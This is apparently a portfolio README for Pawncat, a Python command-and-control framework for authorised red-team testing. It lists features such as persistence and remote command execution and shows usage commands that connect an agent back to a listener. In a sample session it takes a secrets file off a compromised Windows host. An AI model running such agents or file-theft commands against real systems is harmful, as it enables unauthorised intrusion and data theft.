
Pawncat

Overview

Pawncat is a lightweight command-and-control (C2) framework built in Python for authorised red team engagements. It features encrypted communications, modular payload generation, and a clean CLI for managing multiple sessions.

Disclaimer

This tool is intended for authorised security testing only. Unauthorised use against systems you do not own or have explicit permission to test is illegal and unethical.

Features

  • AES-256 encrypted communications — all traffic between the server and agents is encrypted
  • Multi-session management — handle multiple compromised hosts simultaneously
  • Modular payloads — easily extend with custom payload modules
  • File transfer — upload and download files between server and agents
  • Command execution — execute system commands on remote agents
  • Persistence module — optional persistence mechanisms for long-running engagements
  • Clean CLI — intuitive command-line interface with tab completion

Usage

Server

python3 pawncat.py --listen --port 4444

Agent

python3 agent.py --connect 10.10.10.1 --port 4444

Session Management

pawncat> sessions
  [1] 10.10.10.5 - Windows 10 - Active
  [2] 10.10.10.8 - Ubuntu 22.04 - Active

pawncat> interact 1
[10.10.10.5]> whoami
nt authority\system
[10.10.10.5]> download C:\Users\admin\secrets.txt

Architecture

The framework uses a client-server model with a custom binary protocol over TCP sockets. All payloads are generated from templates and can be customised per engagement.

Learning Outcomes

Building Pawncat taught me about socket programming, encryption implementation, protocol design, and the mindset of thinking like an attacker at the infrastructure level.